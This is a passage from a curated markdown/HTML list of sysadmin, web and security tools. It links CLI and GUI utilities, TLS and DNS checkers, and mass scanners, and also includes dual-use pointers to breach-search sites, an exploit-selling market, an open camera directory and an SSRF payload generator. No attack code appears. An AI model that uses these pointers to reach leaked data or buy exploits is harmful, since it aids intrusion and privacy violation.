:small_orange_diamond: <a href="https://www.atoptool.nl/"><b>atop</b></a> - ASCII performance monitor. Includes statistics for CPU, memory, disk, swap, network, and processes.<br>
:small_orange_diamond: <a href="https://en.wikipedia.org/wiki/Lsof"><b>lsof</b></a> - displays in its output information about files that are opened by processes.<br>
:small_orange_diamond: <a href="http://www.brendangregg.com/flamegraphs.html"><b>FlameGraph</b></a> - stack trace visualizer.<br>
:small_orange_diamond: <a href="https://github.com/zevv/lsofgraph"><b>lsofgraph</b></a> - small utility to convert Unix lsof output to a graph showing FIFO and UNIX interprocess communication.<br>
:small_orange_diamond: <a href="https://github.com/mozilla/rr"><b>rr</b></a> - is a lightweight tool for recording, replaying and debugging execution of applications.<br>
:small_orange_diamond: <a href="https://pcp.io/index.html"><b>Performance Co-Pilot</b></a> - a system performance analysis toolkit.<br>
:small_orange_diamond: <a href="https://github.com/sharkdp/hexyl"><b>hexyl</b></a> - a command-line hex viewer.<br>
</p>
##### :black_small_square: Log Analyzers
<p>
:small_orange_diamond: <a href="https://github.com/rcoh/angle-grinder"><b>angle-grinder</b></a> - slice and dice log files on the command line.<br>
:small_orange_diamond: <a href="https://lnav.org"><b>lnav</b></a> - log file navigator with search and automatic refresh.<br>
:small_orange_diamond: <a href="https://goaccess.io/"><b>GoAccess</b></a> - real-time web log analyzer and interactive viewer that runs in a terminal.<br>
:small_orange_diamond: <a href="https://github.com/lebinh/ngxtop"><b>ngxtop</b></a> - real-time metrics for nginx server.<br>
</p>
##### :black_small_square: Databases
<p>
:small_orange_diamond: <a href="https://github.com/xo/usql"><b>usql</b></a> - universal command-line interface for SQL databases.<br>
:small_orange_diamond: <a href="https://github.com/dbcli/pgcli"><b>pgcli</b></a> - postgres CLI with autocompletion and syntax highlighting.<br>
:small_orange_diamond: <a href="https://github.com/dbcli/mycli"><b>mycli</b></a> - terminal client for MySQL with autocompletion and syntax highlighting.<br>
:small_orange_diamond: <a href="https://github.com/dbcli/litecli"><b>litecli</b></a> - SQLite CLI with autocompletion and syntax highlighting.<br>
:small_orange_diamond: <a href="https://github.com/osquery/osquery"><b>OSQuery</b></a> - is a SQL powered operating system instrumentation, monitoring, and analytics framework.<br>
:small_orange_diamond: <a href="https://github.com/ankane/pgsync"><b>pgsync</b></a> - sync data from one Postgres database to another.<br>
:small_orange_diamond: <a href="https://github.com/laixintao/iredis"><b>iredis</b></a> - a terminal client for redis with autocompletion and syntax highlighting.<br>
</p>
##### :black_small_square: TOR
<p>
:small_orange_diamond: <a href="https://github.com/GouveaHeitor/nipe"><b>Nipe</b></a> - script to make Tor Network your default gateway.<br>
:small_orange_diamond: <a href="https://github.com/trimstray/multitor"><b>multitor</b></a> - a tool that lets you create multiple TOR instances with a load-balancing.<br>
</p>
##### :black_small_square: Messengers/IRC Clients
<p>
:small_orange_diamond: <a href="https://irssi.org"><b>Irssi</b></a> - is a free open source terminal based IRC client.<br>
:small_orange_diamond: <a href="https://weechat.org/"><b>WeeChat</b></a> - is an extremely extensible and lightweight IRC client.<br>
</p>
##### :black_small_square: Other
<p>
:small_orange_diamond: <a href="https://github.com/skx/sysadmin-util"><b>sysadmin-util</b></a> - tools for Linux/Unix sysadmins.<br>
:small_orange_diamond: <a href="http://inotify.aiken.cz/"><b>incron</b></a> - is an inode-based filesystem notification technology.<br>
:small_orange_diamond: <a href="https://github.com/axkibe/lsyncd"><b>lsyncd</b></a> - synchronizes local directories with remote targets (Live Syncing Daemon).<br>
:small_orange_diamond: <a href="https://github.com/rgburke/grv"><b>GRV</b></a> - is a terminal based interface for viewing Git repositories.<br>
:small_orange_diamond: <a href="https://jonas.github.io/tig/"><b>Tig</b></a> - text-mode interface for Git.<br>
:small_orange_diamond: <a href="https://github.com/tldr-pages/tldr"><b>tldr</b></a> - simplified and community-driven man pages.<br>
:small_orange_diamond: <a href="https://github.com/mholt/archiver"><b>archiver</b></a> - easily create and extract .zip, .tar, .tar.gz, .tar.bz2, .tar.xz, .tar.lz4, .tar.sz, and .rar.<br>
:small_orange_diamond: <a href="https://github.com/tj/commander.js"><b>commander.js</b></a> - minimal CLI creator in JavaScript.<br>
:small_orange_diamond: <a href="https://github.com/tomnomnom/gron"><b>gron</b></a> - make JSON greppable!<br>
:small_orange_diamond: <a href="https://github.com/itchyny/bed"><b>bed</b></a> - binary editor written in Go.<br>
</p>
#### GUI Tools [<sup>[TOC]</sup>](#anger-table-of-contents)
##### :black_small_square: Terminal emulators
<p>
:small_orange_diamond: <a href="https://github.com/Guake/guake"><b>Guake</b></a> - is a dropdown terminal made for the GNOME desktop environment.<br>
:small_orange_diamond: <a href="https://gnometerminator.blogspot.com/p/introduction.html"><b>Terminator</b></a> - is based on GNOME Terminal, useful features for sysadmins and other users.<br>
:small_orange_diamond: <a href="https://sw.kovidgoyal.net/kitty/"><b>Kitty</b></a> - is a GPU based terminal emulator that supports smooth scrolling and images.<br>
</p>
##### :black_small_square: Network
<p>
:small_orange_diamond: <a href="https://www.wireshark.org/"><b>Wireshark</b></a> - is the world’s foremost and widely-used network protocol analyzer.<br>
:small_orange_diamond: <a href="https://www.ettercap-project.org/"><b>Ettercap</b></a> - is a comprehensive network monitor tool.<br>
:small_orange_diamond: <a href="https://etherape.sourceforge.io/"><b>EtherApe</b></a> - is a graphical network monitoring solution.<br>
:small_orange_diamond: <a href="https://packetsender.com/"><b>Packet Sender</b></a> - is a networking utility for packet generation and built-in UDP/TCP/SSL client and servers.<br>
:small_orange_diamond: <a href="https://ostinato.org/"><b>Ostinato</b></a> - is a packet crafter and traffic generator.<br>
:small_orange_diamond: <a href="https://jmeter.apache.org/"><b>JMeter™</b></a> - open source software to load test functional behavior and measure performance.<br>
:small_orange_diamond: <a href="https://github.com/locustio/locust"><b>locust</b></a> - scalable user load testing tool written in Python.<br>
</p>
##### :black_small_square: Browsers
<p>
:small_orange_diamond: <a href="https://www.torproject.org/"><b>TOR Browser</b></a> - protect your privacy and defend yourself against network surveillance and traffic analysis.<br>
</p>
##### :black_small_square: Password Managers
<p>
:small_orange_diamond: <a href="https://keepassxc.org/"><b>KeePassXC</b></a> - store your passwords safely and auto-type them into your everyday websites and apps.<br>
:small_orange_diamond: <a href="https://www.enpass.io/"><b>Enpass</b></a> - password manager and secure wallet.<br>
</p>
##### :black_small_square: Messengers/IRC Clients
<p>
:small_orange_diamond: <a href="https://hexchat.github.io/index.html"><b>HexChat</b></a> - is an IRC client based on XChat.<br>
:small_orange_diamond: <a href="https://pidgin.im/"><b>Pidgin</b></a> - is an easy to use and free chat client used by millions.<br>
</p>
##### :black_small_square: Messengers (end-to-end encryption)
<p>
:small_orange_diamond: <a href="https://www.signal.org/"><b>Signal</b></a> - is an encrypted communications app.<br>
:small_orange_diamond: <a href="https://wire.com/en/"><b>Wire</b></a> - secure messaging, file sharing, voice calls and video conferences. All protected with end-to-end encryption.<br>
:small_orange_diamond: <a href="https://github.com/prof7bit/TorChat"><b>TorChat</b></a> - decentralized anonymous instant messenger on top of Tor Hidden Services.<br>
:small_orange_diamond: <a href="https://matrix.org/"><b>Matrix</b></a> - an open network for secure, decentralized, real-time communication.<br>
</p>
##### :black_small_square: Text editors
<p>
:small_orange_diamond: <a href="https://www.sublimetext.com/3"><b>Sublime Text</b></a> - is a lightweight, cross-platform code editor known for its speed, ease of use.<br>
:small_orange_diamond: <a href="https://code.visualstudio.com/"><b>Visual Studio Code</b></a> - an open-source and free source code editor developed by Microsoft.<br>
:small_orange_diamond: <a href="https://atom.io/"><b>Atom</b></a> - a hackable text editor for the 21st Century.<br>
</p>
#### Web Tools [<sup>[TOC]</sup>](#anger-table-of-contents)
##### :black_small_square: Browsers
<p>
:small_orange_diamond: <a href="https://www.ssllabs.com/ssltest/viewMyClient.html"><b>SSL/TLS Capabilities of Your Browser</b></a> - test your browser's SSL implementation.<br>
:small_orange_diamond: <a href="https://caniuse.com/"><b>Can I use</b></a> - provides up-to-date browser support tables for support of front-end web technologies.<br>
:small_orange_diamond: <a href="https://panopticlick.eff.org/"><b>Panopticlick 3.0</b></a> - is your browser safe against tracking?<br>
:small_orange_diamond: <a href="https://privacy.net/analyzer/"><b>Privacy Analyzer</b></a> - see what data is exposed from your browser.<br>
:small_orange_diamond: <a href="https://browserleaks.com/"><b>Web Browser Security</b></a> - it's all about Web Browser fingerprinting.<br>
:small_orange_diamond: <a href="https://www.howsmyssl.com/"><b>How's My SSL?</b></a> - help a web server developer learn what real world TLS clients were capable of.<br>
:small_orange_diamond: <a href="https://suche.org/sslClientInfo"><b>sslClientInfo</b></a> - client test (incl TLSv1.3 information).<br>
</p>
##### :black_small_square: SSL/Security
<p>
:small_orange_diamond: <a href="https://www.ssllabs.com/ssltest/"><b>SSLLabs Server Test</b></a> - free online service performs a deep analysis of the configuration of any SSL web server.<br>
:small_orange_diamond: <a href="https://dev.ssllabs.com/ssltest/"><b>SSLLabs Server Test (DEV)</b></a> - free online service performs a deep analysis of the configuration of any SSL web server.<br>
:small_orange_diamond: <a href="https://www.immuniweb.com/ssl/"><b>ImmuniWeb® SSLScan</b></a> - test SSL/TLS (PCI DSS, HIPAA and NIST).<br>
:small_orange_diamond: <a href="https://www.jitbit.com/sslcheck/"><b>SSL Check</b></a> - scan your website for non-secure content.<br>
:small_orange_diamond: <a href="https://cryptcheck.fr/"><b>CryptCheck</b></a> - test your TLS server configuration (e.g. ciphers).<br>
:small_orange_diamond: <a href="https://urlscan.io/"><b>urlscan.io</b></a> - service to scan and analyse websites.<br>
:small_orange_diamond: <a href="https://report-uri.com/home/tools"><b>Report URI</b></a> - monitoring security policies like CSP and HPKP.<br>
:small_orange_diamond: <a href="https://csp-evaluator.withgoogle.com/"><b>CSP Evaluator</b></a> - allows developers and security experts to check if a Content Security Policy.<br>
:small_orange_diamond: <a href="https://uselesscsp.com/"><b>Useless CSP</b></a> - public list about CSP in some big players (might make them care a bit more).<br>
:small_orange_diamond: <a href="https://whynohttps.com/"><b>Why No HTTPS?</b></a> - list of the world's top 100 websites by Alexa rank not automatically redirecting insecure requests.<br>
:small_orange_diamond: <a href="https://ciphersuite.info/"><b>TLS Cipher Suite Search</b></a><br>
:small_orange_diamond: <a href="https://github.com/RaymiiOrg/cipherli.st"><b>cipherli.st</b></a> - strong ciphers for Apache, Nginx, Lighttpd and more.<b>*</b><br>
:small_orange_diamond: <a href="https://2ton.com.au/dhtool/"><b>dhtool</b></a> - public Diffie-Hellman parameter service/tool.<br>
:small_orange_diamond: <a href="https://badssl.com/"><b>badssl.com</b></a> - memorable site for testing clients against bad SSL configs.<br>
:small_orange_diamond: <a href="https://tlsfun.de/"><b>tlsfun.de</b></a> - registered for various tests regarding the TLS/SSL protocol.<br>
:small_orange_diamond: <a href="https://sslmate.com/caa/"><b>CAA Record Helper</b></a> - generate a CAA policy.<br>
:small_orange_diamond: <a href="https://ccadb.org/resources"><b>Common CA Database</b></a> - repository of information about CAs, and their root and intermediate certificates.<br>
:small_orange_diamond: <a href="https://certstream.calidog.io/"><b>CERTSTREAM</b></a> - real-time certificate transparency log update stream.<br>
:small_orange_diamond: <a href="https://crt.sh/"><b>crt.sh</b></a> - discovers certificates by continually monitoring all of the publicly known CT.<br>
:small_orange_diamond: <a href="https://www.hardenize.com/"><b>Hardenize</b></a> - deploy the security standards.<br>
:small_orange_diamond: <a href="https://cryptcheck.fr/suite/"><b>Cipher suite compatibility</b></a> - test TLS cipher suite compatibility.<br>
:small_orange_diamond: <a href="https://www.urlvoid.com/"><b>urlvoid</b></a> - this service helps you detect potentially malicious websites.<br>
:small_orange_diamond: <a href="https://securitytxt.org/"><b>security.txt</b></a> - a proposed standard (generator) which allows websites to define security policies.<br>
:small_orange_diamond: <a href="https://github.com/mozilla/ssl-config-generator"><b>ssl-config-generator</b></a> - help you follow the Mozilla Server Side TLS configuration guidelines.<br>
</p>
##### :black_small_square: HTTP Headers & Web Linters
<p>
:small_orange_diamond: <a href="https://securityheaders.com/"><b>Security Headers</b></a> - analyse the HTTP response headers (with rating system to the results).<br>
:small_orange_diamond: <a href="https://observatory.mozilla.org/"><b>Observatory by Mozilla</b></a> - set of tools to analyze your website.<br>
:small_orange_diamond: <a href="https://webhint.io/"><b>webhint</b></a> - is a linting tool that will help you with your site's accessibility, speed, security and more.<br>
</p>
##### :black_small_square: DNS
<p>
:small_orange_diamond: <a href="http://viewdns.info/"><b>ViewDNS</b></a> - one source for free DNS related tools and information.<br>
:small_orange_diamond: <a href="https://dnslookup.org/"><b>DNSLookup</b></a> - is an advanced DNS lookup tool.<br>
:small_orange_diamond: <a href="https://dnslytics.com/"><b>DNSlytics</b></a> - online DNS investigation tool.<br>
:small_orange_diamond: <a href="https://dnsspy.io/"><b>DNS Spy</b></a> - monitor, validate and verify your DNS configurations.<br>
:small_orange_diamond: <a href="https://zonemaster.iis.se/en/"><b>Zonemaster</b></a> - helps you to control how your DNS works.<br>
:small_orange_diamond: <a href="http://leafdns.com/"><b>Leaf DNS</b></a> - comprehensive DNS tester.<br>
:small_orange_diamond: <a href="https://findsubdomains.com/"><b>Find subdomains online</b></a> - find subdomains for security assessment penetration test.<br>
:small_orange_diamond: <a href="https://dnsdumpster.com/"><b>DNSdumpster</b></a> - dns recon & research, find & lookup dns records.<br>
:small_orange_diamond: <a href="https://dnstable.com/"><b>DNS Table online</b></a> - search for DNS records by domain, IP, CIDR, ISP.<br>
:small_orange_diamond: <a href="https://intodns.com/"><b>intoDNS</b></a> - DNS and mail server health checker.<br>
:small_orange_diamond: <a href="http://www.zonecut.net/dns/"><b>DNS Bajaj</b></a> - check the delegation of your domain.<br>
:small_orange_diamond: <a href="https://www.buddyns.com/delegation-lab/"><b>BuddyDNS Delegation LAB</b></a> - check, trace and visualize delegation of your domain.<br>
:small_orange_diamond: <a href="https://dnssec-debugger.verisignlabs.com/"><b>dnssec-debugger</b></a> - DS or DNSKEY records validator.<br>
:small_orange_diamond: <a href="http://ptrarchive.com/"><b>PTRarchive.com</b></a> - this site is responsible for the safekeeping of historical reverse DNS records.<br>
:small_orange_diamond: <a href="http://xip.io/"><b>xip.io</b></a> - wildcard DNS for everyone.<br>
:small_orange_diamond: <a href="https://ceipam.eu/en/dnslookup.php"><b>dnslookup (ceipam)</b></a> - one of the best DNS propagation checker (and not only).<br>
:small_orange_diamond: <a href="https://whatsmydns.com"><b>What's My DNS</b></a> - DNS propagation checking tool.<br>
:small_orange_diamond: <a href="https://blog.erbbysam.com/index.php/2019/02/09/dnsgrep/"><b>DNSGrep</b></a> - quickly searching large DNS datasets.<br>
</p>
##### :black_small_square: Mail
<p>
:small_orange_diamond: <a href="https://luxsci.com/smtp-tls-checker"><b>smtp-tls-checker</b></a> - check an email domain for SMTP TLS support.<br>
:small_orange_diamond: <a href="https://mxtoolbox.com/SuperTool.aspx"><b>MX Toolbox</b></a> - all of your MX record, DNS, blacklist and SMTP diagnostics in one integrated tool.<br>
:small_orange_diamond: <a href="https://www.checktls.com/index.html"><b>Secure Email</b></a> - complete email test tools for email technicians.<br>
:small_orange_diamond: <a href="http://www.blacklistalert.org/"><b>blacklistalert</b></a> - checks to see if your domain is on a Real Time Spam Blacklist.<br>
:small_orange_diamond: <a href="http://multirbl.valli.org/"><b>MultiRBL</b></a> - complete IP check for sending Mailservers.<br>
:small_orange_diamond: <a href="https://dkimvalidator.com/"><b>DKIM SPF & Spam Assassin Validator</b></a> - checks mail authentication and scores messages with Spam Assassin.<br>
</p>
##### :black_small_square: Encoders/Decoders and Regex testing
<p>
:small_orange_diamond: <a href="https://www.url-encode-decode.com/"><b>URL Encode/Decode</b></a> - tool from above to either encode or decode a string of text.<br>
:small_orange_diamond: <a href="https://uncoder.io/"><b>Uncoder</b></a> - the online translator for search queries on log data.<br>
:small_orange_diamond: <a href="https://regex101.com/"><b>Regex101</b></a> - online regex tester and debugger: PHP, PCRE, Python, Golang and JavaScript.<br>
:small_orange_diamond: <a href="https://regexr.com/"><b>RegExr</b></a> - online tool to learn, build, & test Regular Expressions (RegEx / RegExp).<br>
:small_orange_diamond: <a href="https://www.regextester.com/"><b>RegEx Testing</b></a> - online regex testing tool.<br>
:small_orange_diamond: <a href="https://www.regexpal.com/"><b>RegEx Pal</b></a> - online regex testing tool + other tools.<br>
:small_orange_diamond: <a href="https://gchq.github.io/CyberChef/"><b>The Cyber Swiss Army Knife</b></a> - a web app for encryption, encoding, compression and data analysis.<br>
</p>
##### :black_small_square: Net-tools
<p>
:small_orange_diamond: <a href="https://toolbar.netcraft.com/site_report"><b>Netcraft</b></a> - detailed report about the site, helping you to make informed choices about their integrity.<b>*</b><br>
:small_orange_diamond: <a href="https://atlas.ripe.net/"><b>RIPE NCC Atlas</b></a> - a global, open, distributed Internet measurement platform.<br>
:small_orange_diamond: <a href="https://www.robtex.com/"><b>Robtex</b></a> - uses various sources to gather public information about IP numbers, domain names, host names, routes etc.<br>
:small_orange_diamond: <a href="https://securitytrails.com/"><b>Security Trails</b></a> - APIs for Security Companies, Researchers and Teams.<br>
:small_orange_diamond: <a href="https://tools.keycdn.com/curl"><b>Online Curl</b></a> - curl test, analyze HTTP Response Headers.<br>
:small_orange_diamond: <a href="https://extendsclass.com/"><b>Online Tools for Developers</b></a> - HTTP API tools, testers, encoders, converters, formatters, and other tools.<br>
:small_orange_diamond: <a href="https://ping.eu/"><b>Ping.eu</b></a> - online Ping, Traceroute, DNS lookup, WHOIS and others.<br>
:small_orange_diamond: <a href="https://network-tools.com/"><b>Network-Tools</b></a> - network tools for webmasters, IT technicians & geeks.<br>
:small_orange_diamond: <a href="https://bgpview.io/"><b>BGPview</b></a> - search for any ASN, IP, Prefix or Resource name.<br>
:small_orange_diamond: <a href="https://isbgpsafeyet.com/"><b>Is BGP safe yet?</b></a> - check BGP (RPKI) security of ISPs and other major Internet players.<br>
:small_orange_diamond: <a href="https://riseup.net/"><b>Riseup</b></a> - provides online communication tools for people and groups working on liberatory social change.<br>
:small_orange_diamond: <a href="https://www.virustotal.com/gui/home/upload"><b>VirusTotal</b></a> - analyze suspicious files and URLs to detect types of malware.<br>
</p>
##### :black_small_square: Privacy
<p>
:small_orange_diamond: <a href="https://www.privacytools.io/"><b>privacytools.io</b></a> - provides knowledge and tools to protect your privacy against global mass surveillance.<br>
:small_orange_diamond: <a href="https://dnsprivacy.org/wiki/display/DP/DNS+Privacy+Test+Servers"><b>DNS Privacy Test Servers</b></a> - DNS privacy recursive servers list (with a 'no logging' policy).<br>
</p>
##### :black_small_square: Code parsers/playgrounds
<p>
:small_orange_diamond: <a href="https://www.shellcheck.net/"><b>ShellCheck</b></a> - finds bugs in your shell scripts.<br>
:small_orange_diamond: <a href="https://explainshell.com/"><b>explainshell</b></a> - get interactive help texts for shell commands.<br>
:small_orange_diamond: <a href="https://jsbin.com/?html,output"><b>jsbin</b></a> - live pastebin for HTML, CSS & JavaScript and more.<br>
:small_orange_diamond: <a href="https://codesandbox.io/"><b>CodeSandbox</b></a> - online code editor for web application development. Supports React, Vue, Angular, CxJS, Dojo, etc.<br>
:small_orange_diamond: <a href="http://sandbox.onlinephpfunctions.com/"><b>PHP Sandbox</b></a> - test your PHP code with this code tester.<br>
:small_orange_diamond: <a href="https://www.repl.it/"><b>Repl.it</b></a> - an instant IDE to learn, build, collaborate, and host all in one place.<br>
:small_orange_diamond: <a href="http://www.vclfiddle.net/"><b>vclFiddle</b></a> - is an online tool for experimenting with the Varnish Cache VCL.<br>
</p>
##### :black_small_square: Performance
<p>
:small_orange_diamond: <a href="https://gtmetrix.com/"><b>GTmetrix</b></a> - analyze your site’s speed and make it faster.<br>
:small_orange_diamond: <a href="https://performance.sucuri.net/"><b>Sucuri loadtimetester</b></a> - test here the
performance of any of your sites from across the globe.<br>
:small_orange_diamond: <a href="https://tools.pingdom.com/"><b>Pingdom Tools</b></a> - analyze your site’s speed around the world.<br>
:small_orange_diamond: <a href="https://pingme.io/"><b>PingMe.io</b></a> - run website latency tests across multiple geographic regions.<br>
:small_orange_diamond: <a href="https://developers.google.com/speed/pagespeed/insights/"><b>PageSpeed Insights</b></a> - analyze your site’s speed and make it faster.<br>
:small_orange_diamond: <a href="https://web.dev/"><b>web.dev</b></a> - helps developers like you learn and apply the web's modern capabilities to your own sites and apps.<br>
:small_orange_diamond: <a href="https://github.com/GoogleChrome/lighthouse"><b>Lighthouse</b></a> - automated auditing, performance metrics, and best practices for the web.<br>
</p>
##### :black_small_square: Mass scanners (search engines)
<p>
:small_orange_diamond: <a href="https://censys.io/"><b>Censys</b></a> - platform that helps information security practitioners discover, monitor, and analyze devices.<br>
:small_orange_diamond: <a href="https://www.shodan.io/"><b>Shodan</b></a> - the world's first search engine for Internet-connected devices.<br>
:small_orange_diamond: <a href="https://2000.shodan.io/#/"><b>Shodan 2000</b></a> - do you use Shodan for everyday work? This tool looks for randomly generated data from Shodan.<br>
:small_orange_diamond: <a href="https://viz.greynoise.io/table"><b>GreyNoise</b></a> - mass scanner such as Shodan and Censys.<br>
:small_orange_diamond: <a href="https://www.zoomeye.org/"><b>ZoomEye</b></a> - search engine for cyberspace that lets the user find specific network components.<br>
:small_orange_diamond: <a href="https://netograph.io/"><b>netograph</b></a> - tools to monitor and understand deep structure of the web.<br>
:small_orange_diamond: <a href="https://fofa.so/"><b>FOFA</b></a> - is a cyberspace search engine.<br>
:small_orange_diamond: <a href="https://www.onyphe.io/"><b>onyphe</b></a> - is a search engine for open-source and cyber threat intelligence data collected.<br>
:small_orange_diamond: <a href="https://intelx.io/"><b>IntelligenceX</b></a> - is a search engine and data archive.<br>
:small_orange_diamond: <a href="https://app.binaryedge.io/"><b>binaryedge</b></a> - it scan the entire internet space and create real-time threat intelligence streams and reports.<br>
:small_orange_diamond: <a href="https://wigle.net/"><b>wigle</b></a> - is a submission-based catalog of wireless networks. All the networks. Found by Everyone.<br>
:small_orange_diamond: <a href="https://publicwww.com/"><b>PublicWWW</b></a> - find any alphanumeric snippet, signature or keyword in the web pages HTML, JS and CSS code.<br>
:small_orange_diamond: <a href="https://inteltechniques.com/index.html"><b>IntelTechniques</b></a> - this repository contains hundreds of online search utilities.<br>
:small_orange_diamond: <a href="https://hunter.io/"><b>hunter</b></a> - lets you find email addresses in seconds and connect with the people that matter for your business.<br>
:small_orange_diamond: <a href="https://ghostproject.fr/"><b>GhostProject?</b></a> - search by full email address or username.<br>
:small_orange_diamond: <a href="https://www.databreaches.live/"><b>databreaches</b></a> - was my email affected by data breach?<br>
:small_orange_diamond: <a href="https://weleakinfo.com"><b>We Leak Info</b></a> - world's fastest and largest data breach search engine.<br>
:small_orange_diamond: <a href="https://pulsedive.com/"><b>Pulsedive</b></a> - scans of malicious URLs, IPs, and domains, including port scans and web requests.<br>
:small_orange_diamond: <a href="https://buckets.grayhatwarfare.com/"><b>Buckets by Grayhatwarfar</b></a> - database with public search for Open Amazon S3 Buckets and their contents.<br>
:small_orange_diamond: <a href="https://vigilante.pw/"><b>Vigilante.pw</b></a> - the breached database directory.<br>
:small_orange_diamond: <a href="https://builtwith.com/"><b>builtwith</b></a> - find out what websites are built with.<br>
:small_orange_diamond: <a href="https://nerdydata.com/"><b>NerdyData</b></a> - search the web's source code for technologies, across millions of sites.<br>
:small_orange_diamond: <a href="https://www.mmnt.net/"><b>Mamont's open FTP Index</b></a> - if a target has an open FTP site with accessible content it will be listed here.<br>
:small_orange_diamond: <a href="https://osintframework.com/"><b>OSINT Framework</b></a> - focused on gathering information from free tools or resources.<br>
:small_orange_diamond: <a href="https://www.maltiverse.com/search"><b>maltiverse</b></a> - is a service oriented to cybersecurity analysts for the advanced analysis of indicators of compromise.<br>
:small_orange_diamond: <a href="https://leakedsource.ru/main/"><b>Leaked Source</b></a> - is a collaboration of data found online in the form of a lookup.<br>
:small_orange_diamond: <a href="https://search.weleakinfo.com/"><b>We Leak Info</b></a> - to help everyday individuals secure their online life, avoiding getting hacked.<br>
:small_orange_diamond: <a href="https://pipl.com/"><b>pipl</b></a> - is the place to find the person behind the email address, social username or phone number.<br>
:small_orange_diamond: <a href="https://abuse.ch/"><b>abuse.ch</b></a> - is operated by a random swiss guy fighting malware for non-profit.<br>
:small_orange_diamond: <a href="http://malc0de.com/database/"><b>malc0de</b></a> - malware search engine.<br>
:small_orange_diamond: <a href="https://cybercrime-tracker.net/index.php"><b>Cybercrime Tracker</b></a> - monitors and tracks various malware families that are used to perpetrate cyber crimes.<br>
:small_orange_diamond: <a href="https://github.com/eth0izzle/shhgit/"><b>shhgit</b></a> - find GitHub secrets in real time.<br>
:small_orange_diamond: <a href="https://searchcode.com/"><b>searchcode</b></a> - helping you find real world examples of functions, API's and libraries.<br>
:small_orange_diamond: <a href="http://www.insecam.org/"><b>Insecam</b></a> - the world biggest directory of online surveillance security cameras.<br>
:small_orange_diamond: <a href="http://index-of.es/"><b>index-of</b></a> - contains great stuff like: security, hacking, reverse engineering, cryptography, programming etc.<br>
:small_orange_diamond: <a href="https://opendata.rapid7.com/"><b>Rapid7 Labs Open Data</b></a> - is a great resources of datasets from Project Sonar.<br>
</p>
##### :black_small_square: Generators
<p>
:small_orange_diamond: <a href="https://thispersondoesnotexist.com/"><b>thispersondoesnotexist</b></a> - generate fake faces in one click - endless possibilities.<br>
:small_orange_diamond: <a href="https://generated.photos"><b>AI Generated Photos</b></a> - 100.000 AI generated faces.<br>
:small_orange_diamond: <a href="https://fakeface.co/"><b>fakeface</b></a> - fake faces browser.<br>
:small_orange_diamond: <a href="https://tools.intigriti.io/redirector/"><b>Intigriti Redirector</b></a> - open redirect/SSRF payload generator.<br>
</p>
##### :black_small_square: Passwords
<p>
:small_orange_diamond: <a href="https://haveibeenpwned.com/"><b>have i been pwned?</b></a> - check if you have an account that has been compromised in a data breach.<br>
:small_orange_diamond: <a href="https://www.dehashed.com/"><b>dehashed</b></a> - is a hacked database search engine.<br>
:small_orange_diamond: <a href="https://leakedsource.ru/"><b>Leaked Source</b></a> - is a collaboration of data found online in the form of a lookup.<br>
</p>
##### :black_small_square: CVE/Exploits databases
<p>
:small_orange_diamond: <a href="https://cve.mitre.org/"><b>CVE Mitre</b></a> - list of publicly known cybersecurity vulnerabilities.<br>
:small_orange_diamond: <a href="https://www.cvedetails.com/"><b>CVE Details</b></a> - CVE security vulnerability advanced database.<br>
:small_orange_diamond: <a href="https://www.exploit-db.com/"><b>Exploit DB</b></a> - CVE compliant archive of public exploits and corresponding vulnerable software.<br>
:small_orange_diamond: <a href="https://0day.today/"><b>0day.today</b></a> - exploits market provides you the possibility to buy zero-day exploits and also to sell 0day exploits.<br>
:small_orange_diamond: <a href="https://sploitus.com/"><b>sploitus</b></a> - the exploit and tools database.<br>
:small_orange_diamond: <a href="https://cxsecurity.com/exploit/"><b>cxsecurity</b></a> - free vulnerability database.<br>
:small_orange_diamond: <a href="https://www.vulncode-db.com/"><b>Vulncode-DB</b></a> - is a database for vulnerabilities and their corresponding source code if available.<br>
:small_orange_diamond: <a href="https://cveapi.com/"><b>cveapi</b></a> - free API for CVE data.<br>
</p>
##### :black_small_square: Mobile apps scanners
<p>
:small_orange_diamond: <a href="https://www.immuniweb.com/mobile/"><b>ImmuniWeb® Mobile App Scanner</b></a> - test security and privacy of mobile apps (iOS & Android).<br>
:small_orange_diamond: <a href="https://vulnerabilitytest.quixxi.com/"><b>Quixxi</b></a> - free Mobile App Vulnerability Scanner for Android & iOS.<br>
:small_orange_diamond: <a href="https://www.ostorlab.co/scan/mobile/"><b>Ostorlab</b></a> - analyzes mobile application to identify vulnerabilities and potential weaknesses.<br>
</p>
##### :black_small_square: Private Search Engines
<p>
:small_orange_diamond: <a href="https://www.startpage.com/"><b>Startpage</b></a> - the world's most private search engine.<br>
:small_orange_diamond: <a href="https://searx.me/"><b>searX</b></a> - a privacy-respecting, hackable metasearch engine.<br>
:small_orange_diamond: <a href="https://darksearch.io/"><b>darksearch</b></a> - the 1st real Dark Web search engine.<br>
:small_orange_diamond: <a href="https://www.qwant.com/"><b>Qwant</b></a> - the search engine that respects your privacy.<br>
</p>
##### :black_small_square: Secure Webmail Providers
<p>
:small_orange_diamond: <a href="https://countermail.com/"><b>CounterMail</b></a> - is a secure and easy to use online email service, designed to provide maximum security and privacy.<br>
:small_orange_diamond: <a href="http://mail2tor.com/"><b>Mail2Tor</b></a> - is a Tor Hidden Service that allows anyone to send and receive emails anonymously.<br>
:small_orange_diamond: <a href="https://tutanota.com/"><b>Tutanota</b></a> - is the world's most secure email service and amazingly easy to use.<br>
:small_orange_diamond: <a href="https://protonmail.com/"><b>Protonmail</b></a> - is the world's largest secure email service, developed by CERN and MIT scientists.<br>
:small_orange_diamond: <a href="https://www.startmail.com/en/"><b>Startmail</b></a> - private & encrypted email made easy.<br>
</p>
##### :black_small_square: Crypto
<p>
:small_orange_diamond: <a href="https://keybase.io/"><b>Keybase</b></a> - it's open source and powered by public-key cryptography.<br>
</p>
##### :black_small_square: PGP Keyservers
<p>
:small_orange_diamond: <a href="https://keyserver.ubuntu.com/"><b>SKS OpenPGP Key server</b></a> - services for the SKS keyservers used by OpenPGP.<br>
</p>
#### Systems/Services [<sup>[TOC]</sup>](#anger-table-of-contents)
##### :black_small_square: Operating Systems
<p>
:small_orange_diamond: <a href="http://www.slackware.com/"><b>Slackware</b></a> - the most "Unix-like" Linux distribution.<br>
:small_orange_diamond: <a href="https://www.openbsd.org/"><b>OpenBSD</b></a> - multi-platform 4.4BSD-based UNIX-like operating system.<br>
:small_orange_diamond: <a href="https://hardenedbsd.org/"><b>HardenedBSD</b></a> - HardenedBSD aims to implement innovative exploit mitigation and security solutions.<br>
:small_orange_diamond: <a href="https://www.kali.org/"><b>Kali Linux</b></a> - Linux distribution used for Penetration Testing, Ethical Hacking and network security assessments.<br>
